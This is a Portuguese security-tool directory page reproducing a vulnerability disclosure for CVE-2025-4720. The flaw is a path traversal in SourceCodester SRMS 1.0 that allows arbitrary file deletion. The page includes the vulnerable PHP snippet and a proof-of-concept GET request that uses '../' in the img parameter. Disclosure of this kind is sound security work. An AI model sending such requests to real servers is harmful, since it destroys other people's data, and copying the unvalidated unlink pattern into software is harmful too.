Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
duplicate-CVE-2025-4720- — Prova de conceito de exploração para CVE-2025-4720: path traversal no SourceCodester SRMS 1.0 permitindo exclusão arbitrária de arquivos através de parâmetro GET não validado. | Kitploit
Ferramentas/GitHubGitHub/xmyronn/duplicate-cve-2025-4720-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubxmyronn/duplicate-cve-2025-4720-

duplicate-CVE-2025-4720-

Prova de conceito de exploração para CVE-2025-4720: path traversal no SourceCodester SRMS 1.0 permitindo exclusão arbitrária de arquivos através de parâmetro GET não validado.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 4 mesesAinda não revisado

cve-srms-drop-student-path-traversal (CVE-2025-4720)(dupe)

Exclusão Arbitrária de Arquivos no SRMS 1.0 do SourceCodester

Descrição

Existe uma vulnerabilidade de path traversal no endpoint drop_student.php do Student Result Management System (SRMS) 1.0 do SourceCodester.

A aplicação recebe entrada controlada pelo usuário do parâmetro GET img e a passa diretamente para a função unlink() sem validação, permitindo a exclusão de arquivos arbitrários no servidor.


Código Vulnerável

root@kitploit:~
$img = $_GET['img'];

if ($img == "DEFAULT") {

} else {
    unlink('images/students/' . $img);
}

Tipo de Vulnerabilidade

  • CWE-22: Path Traversal
  • Impacto: Exclusão Arbitrária de Arquivos

Prova de Conceito (PoC)

  1. Crie um arquivo na raiz da aplicação: Screenshot 2026-04-04 013454
root@kitploit:~
C:\xampp\htdocs\srms_0\srms\new_test.txt
  1. Envie a seguinte requisição: Screenshot 2026-04-04 013510
Screenshot 2026-04-04 013633
root@kitploit:~
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
  1. Observe que o arquivo é excluído do servidor. Screenshot 2026-04-04 013650

Impacto

Um atacante pode excluir arquivos arbitrários acessíveis ao servidor web, incluindo:

  • Arquivos de configuração da aplicação
  • Logs
  • Conteúdo enviado

Isso pode levar a negação de serviço ou exploração adicional.


Notas Adicionais

Esta vulnerabilidade representa um vetor de ataque distinto em comparação com problemas relatados anteriormente no SRMS, pois:

  • Usa uma requisição GET
  • Não requer upload de arquivo
  • Pode ser potencialmente explorada via CSRF

Fornecedor

SourceCodester


Produto

Sistema de Gerenciamento de Resultados de Alunos (SRMS) https://www.sourcecodester.com/srms-makumbusho


Versão

1.0


Autor

Imad Alvi

Baixar ferramenta